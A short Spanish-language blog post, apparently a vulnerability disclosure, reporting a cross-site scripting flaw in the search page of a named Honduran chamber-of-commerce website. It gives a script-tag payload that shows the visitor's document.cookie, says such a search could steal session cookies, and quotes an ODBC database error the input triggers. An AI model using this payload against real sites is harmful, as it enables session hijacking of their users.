El error de XSS se encuentra en el buscador en español de dicha web
http://www.amchamhonduras.org/buscar_es.asp
Al realizar la siguiente busqueda por ejemplo podriamos robar cookies de sesion :
<script>
alert ('Mi Cookie!:'+document.cookie)
</script>
Y por su fuera poco esto tambien genera un error en la base de datos:
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
Hasta la PROXYma
0 comentarios :
Publicar un comentario